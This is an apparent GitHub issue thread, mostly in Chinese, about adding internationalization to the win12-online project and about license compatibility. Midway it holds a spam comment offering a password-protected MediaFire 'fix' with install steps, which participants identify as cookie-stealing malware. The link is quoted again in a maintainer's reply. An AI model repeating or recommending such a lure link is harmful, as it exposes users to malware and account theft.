### ISSUE TITLE
[建议] 国际化的可能方案

### ISSUE THREAD

**Issue by lingbopro** [win12-online/win12#457]
## 描述

可以参考一下我在 https://github.com/Minemetero/Table-Tennis-Counter 这个项目里的国际化方案，使用一个特殊的数据属性对应翻译键，并用JS动态替换文本，同时支持格式化

## 方案

参考我和 @Minemetero 的项目 [Table-Tennis-Counter](https://github.com/Minemetero/Table-Tennis-Counter) 的国际化方案（代码位于 [/assets/js/lang.js](https://github.com/Minemetero/Table-Tennis-Counter/blob/main/assets/js/lang.js)，具体使用方法可见项目里的其他HTML和JS文件

**Comment by lingbopro** [comment]
不过我们的仓库是 Apache Licence 的
@Minemetero 你怎么看

@tjy-gitnub 看一下？

**Comment by Minemetero** [comment]
Apache 的话 qwq

**Comment by Minemetero** [comment]
Apache 2.0 许可证发布的库或代码并将其整合到一个以 EPL 2.0 许可证发布的项目中，这是被允许的。EPL 2.0 并不限制你在项目中使用其他许可证下的代码，包括 Apache 2.0 许可证的代码。

**Comment by lingbopro** [comment]
那没事了

**Comment by tjy-gitnub** [comment]
虽然但是我真的很想关

**Comment by Minemetero** [comment]
lol

**Comment by tjy-gitnub** [comment]
我们已经放弃了翻译工作
另外，迫不得已地，部分内容已被修改，还请谅解

**Comment by lingbopro** [comment]
为！什！么！不！翻！译！！

（我可以来帮忙翻

**Comment by lingbopro** [comment]
可以提取出所有的文字然后挂Crowdin上

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tjy-gitnub** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

Ha? I don't understand what you are talking about..sorry  so, what is this `fix.rar` used for?

**Comment by lingbopro** [comment]
NO！！不要引用回复！！！不然可能会封号！！！

**Comment by lingbopro** [comment]
@tjy-gitnub 这个是病毒

**Comment by lingbopro** [comment]
GitHub上有人发这个就会封

**Comment by tjy-gitnub** [comment]
。。你试过吗（

**Comment by lingbopro** [comment]
最好赶快删了

**Comment by lingbopro** [comment]
> 。。你试过吗（

有的，maboloshi/github-chinese#276

另外这个是概率封号

**Comment by tjy-gitnub** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, password: changeme when you installing it, you need to place a check in install to path and select usx

I have tried opening the only exe file and nothing happened

**Comment by lingbopro** [comment]
啊？？你打开了？？？？？？

**Comment by tjy-gitnub** [comment]
@rickdoq You'd better explain it

**Comment by lingbopro** [comment]
@tjy-gitnub 看这个视频

https://www.bilibili.com/video/BV1cjsTekE3s

他应该也是运行了这样的程序然后被盗Cookie了，所以才被操控发的

**Comment by tjy-gitnub** [comment]
wow

**Comment by Minemetero** [comment]
这个被deleted是什么好东西

**Comment by Minemetero** [comment]
![image_2024-09-08_153652809](https://github.com/user-attachments/assets/21c4c109-21c5-4637-b303-76616747e9f8)
我已经忘了是啥，我们写了什么来着，可以让官方亲自出马

**Comment by lingbopro** [comment]
> 这个被deleted是什么好东西

我也不到啊
